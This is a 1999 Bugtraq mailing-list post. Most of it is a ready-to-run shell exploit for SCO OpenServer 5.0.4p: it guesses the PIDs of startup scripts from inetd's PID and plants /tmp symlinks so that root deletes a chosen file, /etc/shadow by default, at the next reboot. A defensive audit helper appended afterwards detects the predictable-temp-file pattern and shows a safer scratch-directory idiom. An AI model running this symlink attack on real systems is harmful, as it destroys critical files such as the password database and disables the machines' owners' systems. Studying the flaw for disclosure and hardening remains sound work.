Bugtraq mailing list archives

Little exploit for startup scripts (SCO 5.0.4p).


From: leshka () LESHKA CHUVASHIA SU (leshka)
Date: Sun, 7 Mar 1999 15:07:23 +0300


#!/bin/sh
#
#                                   ... The punishment for inobedience ...
#                                                   (Cycle # 2)
#
#                This simple script can help to erase any file
#                 (SCO OpenServer Enterprise System v 5.0.4p).
#                                 Have fun !
#
#
#
#
# Some of the "/etc/rc2.d" startup scripts create and then delete temporary
# files with easily predictable names in the "/tmp" directory.  Below are a
# few interesting fragments of those nice scripts:
#
# S84rpcinit:
# ...
#       /bin/su root -c "/bin/ps -ef" > /tmp/rpc$$ 2>/tmp/rpc.err$$
#       /bin/rm -f /tmp/rpc.err$$
# ...
#       rm -rf /tmp/rpc$$
#
# S95nis:
# ...
#       /bin/su root -c "/bin/ps -ef" > /tmp/nis$$ 2>/tmp/nis.err$$
#       /bin/rm -f /tmp/nis.err$$
# ...
#       rm -f /tmp/nis$$
#
# S85tcp:
# ...
#       /bin/su root -c "/bin/ps -ef" > /tmp/tps$$ 2>/tmp/ps.err$$
#       /bin/rm -f /tmp/ps.err$$
# ...
#       /bin/rm -f /tmp/tps$$
#
# S89nfs:
# ...
#       /bin/su root -c "/bin/ps -ef" > /tmp/nfs$$ 2>/tmp/nfs.err$$
#       /bin/rm -f /tmp/nfs.err$$
# ...
#       rm -f /tmp/nfs$$
#
# Every time during startup, such shell scripts create files with names that
# include the process number of the shell script itself.  My numerous tests
# showed that the number is always the same with every reboot.  Pretty good,
# isn't it? One problem: how to determine the process number of such a script?
# It's so simple!  Child processes of this script have PIDs with values
# slightly higher than the parent's PID.  A little math and one gets it.  The
# next step is creating a few symbolic links to the victim file in the "/tmp"
# directory.  During the next startup the victim file will be destroyed.
#
# P.S.  Looking forward to SCO publishing a complete list of the names of
# such perfect shell scripts.
#
#                                   999,99*2
#
#                            ----------------------
#                ---------------------------------------------
#     -----------------   Dedicated to my beautiful lady   ------------------
#                ---------------------------------------------
#                            ----------------------
#
#       Leshka Zakharoff, 1999. E-mail: leshka () leshka chuvashia su (.ru)
#
#
#
if [ _$1 = "_" ]
then
    {
     echo -n "File to delete [/etc/shadow]:"
     read victim_file
     if [ _$victim_file = "_" ]
        then
            victim_file="/etc/shadow"
        fi
    }
else
    victim_file=$1
fi
# inetd is started by one of the rc2.d scripts, so its PID is a little above
# the PID that script had; walk back 30 PIDs to cover the candidate range.
pid=`/bin/ps -ef|/bin/grep -v awk|/usr/bin/awk '/inetd/ { printf  $2 }'`
lastpid=`expr $pid - 30`
while [ $pid != $lastpid ]
      do
        # plant a link at each candidate /tmp/tps<pid> name (S85tcp's temp file)
        pid=`expr $pid - 1`;ln -fs "$victim_file" /tmp/tps$pid
      done
echo Done ! File \"$victim_file\" will be destroyed after the next reboot.
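An added audit helper, written for this archive page and not part of the original post or of SCO's scripts: it flags the rc-script pattern described above (redirections into /tmp/<name>$$) and shows a scratch-directory idiom that a pre-planted symlink cannot subvert. It assumes a POSIX sh with grep, sed, awk, mkdir -m and mktemp -d; the sample scripts it scans are constructed.

```shell
#!/bin/sh
# Added audit helper, not from the original post. Assumes POSIX sh, grep,
# sed, awk, mkdir -m and mktemp -d.

# Print "script:line:text" for each line in DIR's S* scripts that redirects
# into a /tmp path whose only variable part is $$.
find_predictable_tmp() {
    for f in "$1"/S*; do
        [ -f "$f" ] || continue
        grep -n '> */tmp/[A-Za-z0-9._]*\$\$' "$f" | sed "s|^|${f##*/}:|"
    done
}

# Number of offending lines under DIR (0 when clean).
count_predictable_tmp() {
    find_predictable_tmp "$1" | wc -l | tr -d ' '
}

# Safer idiom for scripts that need scratch files: create a fresh private
# directory with mkdir, which is atomic, never follows a symlink and fails
# if the name already exists; the random suffix makes the name hard to guess.
# Prints the directory path, or returns 1 if none could be created.
make_private_tmpdir() {
    i=0
    while [ "$i" -lt 20 ]; do
        r=`awk 'BEGIN { srand(); print int(rand() * 1000000) }'`
        d="${TMPDIR:-/tmp}/rc.$$.$r.$i"
        if mkdir -m 700 "$d" 2>/dev/null; then
            echo "$d"
            return 0
        fi
        i=`expr $i + 1`
    done
    return 1
}

# Constructed sample scripts (not SCO's real files) modelled on the fragments
# quoted above; one line per file uses the risky pattern, the others do not.
demo_dir=`mktemp -d`
cat > "$demo_dir/S85tcp" <<'EOF'
/bin/su root -c "/bin/ps -ef" > /tmp/tps$$ 2>/tmp/ps.err$$
/bin/rm -f /tmp/ps.err$$
EOF
cat > "$demo_dir/S95nis" <<'EOF'
scratch=`make_private_tmpdir` || exit 1
/bin/su root -c "/bin/ps -ef" > "$scratch/ps.out"
/bin/su root -c "/bin/ps -ef" > /tmp/nis$$ 2>/tmp/nis.err$$
EOF
find_predictable_tmp "$demo_dir"
```

Running it lists `S85tcp:1:` and `S95nis:3:` as the two offending lines, while the line that writes into the private directory is not reported.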


